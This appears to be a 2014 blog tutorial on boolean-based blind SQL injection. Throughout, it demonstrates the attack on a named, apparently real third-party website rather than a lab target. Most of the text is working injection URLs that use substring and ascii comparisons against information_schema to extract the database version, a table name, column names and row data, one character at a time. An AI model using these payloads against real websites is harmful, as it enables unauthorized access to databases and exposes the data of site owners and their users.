Wednesday, 21 May 2014

BOOLEAN BASED BLIND SQL INJECTION



Introduction


So a lot of people view bling injection as having to guess everything, when it's called blind injection because no data is visible on the page as an outcome.

Remember, whenever you're injecting a site, as long as information_schema exists (version 5 or more), then you can use it to get data out of a page. This includes table names, database names, columns, and all the rest..


Here's a quick tutorial on getting data using blind injection for versions 5 or above, without guessing the outcome.

If you want to read up on some basic blind injection, you can check out this tutorial here.

I'll be using this site as an example.
Getting The Version


Code:
http://cathedralhillpress.com/book.php?id=1


Let's start by getting the version, to see if we can use substring() to get data out of information_schema.
Code:
http://cathedralhillpress.com/book.php?id=1 and substring(version(),1,1)=5


It loads fine, now let's replace the 5 with a 4 to double check.
Code:
http://cathedralhillpress.com/book.php?id=1 and substring(version(),1,1)=4

As you can see, the page has a huge chunk of text and pictures missing off of the page.

Getting The Table Names

Now let's get the first character, of the first table name out of our database.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+​limit+0,1),1,1))>0

The page loaded fine, so we know our first characters' ascii value is more then 0.

So we increment 0 until we get around the area it will be in.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+​limit+0,1),1,1))>75
We know it's more then 75, so let's go up a little bit more.
Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+​limit+0,1),1,1))>80



Now we get our error, so let's go down, and change more then, to equals to get the exact value.
Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+​limit+0,1),1,1))=76


We get our error, so let's go up.
Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+​limit+0,1),1,1))=77


Another error, let's go up again.
Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+​limit+0,1),1,1))=78


And now it loads fine, so let's check the ascii value for 78.

You can check that here, by looking at the ASCII table.
ASCII Table

78 comes back to "N".

Now we know our first letter is N, so let's get the next letter by incrementing the 1, to a 2, in our substring() statement.
Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+​limit+0,1),2,1))>100


We know it's more then 100, so let's go up to 101 now.
Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+​limit+0,1),2,1))>101
We get our error. If the returned value is greater then 100, but not greater then 101, then it has to be 101. It's common sense.
Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+​limit+0,1),2,1))=101
And it loads fine...Now convert the ascii value of 101 to text. It comes back to "e".

So far we have "Ne"

Now you can either keep getting the returned values, or try and guess the table name. It looks like News, so let's get our next character and guess.

The ascii value of "w" is 119, so let's see if it comes out positive.
Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+​limit+0,1),3,1))=119


It loads fine, so now we have "New".

Lets check the last one...

The value of "s" is 115, so let's guess again.
Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+​limit+0,1),4,1))=115


Now we have our "News" table, but how do we know if there's more characters or not? We can check if the 5th letter's ascii value is > 0, and if it's not, it doesn't exist. So let's check.
Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+​limit+0,1),5,1))>0

And the page loads with an error.

Getting The Column Names

Getting the columns is fairly similar to getting the table names, you just add a where clause, and convert your table name to HEX/ASCII characters.

Let's see if our table even has columns first.

Code:
cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+​limit+0,1),1,1))>0

Page loads fine, so we have a first character that's value is more then 0. Now let's get the column name.
Code:
cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+​limit+0,1),1,1))>100


No errors, let's go up.
Code:
cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+​limit+0,1),1,1))>105


Error, it's between 100 and 105.
Code:
cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+​limit+0,1),1,1))=105


Loads fine, the value of 105 is "i".

Then we repeat the process, until we get our next character.
Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+​limit+0,1),2,1))>95


No error, let's try 100.
Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+​limit+0,1),2,1))>100


Error, let's see if it = 100.
Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+​limit+0,1),2,1))=100


No error, so now we have "id". Theres your first column, to get the next one, you'd just increase the limit and start over on your substring() statement.
Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+​limit+1,1),1,1))>0

Getting Data Out Of Columns

It's the same process, except we put our column names in a concat statement, FROM the TABLENAME.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(id)+from+News+limit+0,1),1,1))>0


So let's get our first character..
Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(id)+from+News+limit+0,1),1,1))>45


No error, let's go up.
Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(id)+from+News+limit+0,1),1,1))>50


Error, go back down until you find the right one.
Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(id)+from+News+limit+0,1),1,1))=49


Loads fine, and the ascii value of 49 comes back to "1".

Now let's check if there's a second character..
Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(id)+from+News+limit+0,1),2,1))>0

We get an error, so that was all that was our first result.

Conclusion


As you can see, "Blind Injection" doesn't really have to do with guessing, as long as your site has information_schema. The correct term is actually "Boolean Based Blind Injection", which makes sense. A Boolean returns a value of true/false, which is what we just went over.



Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)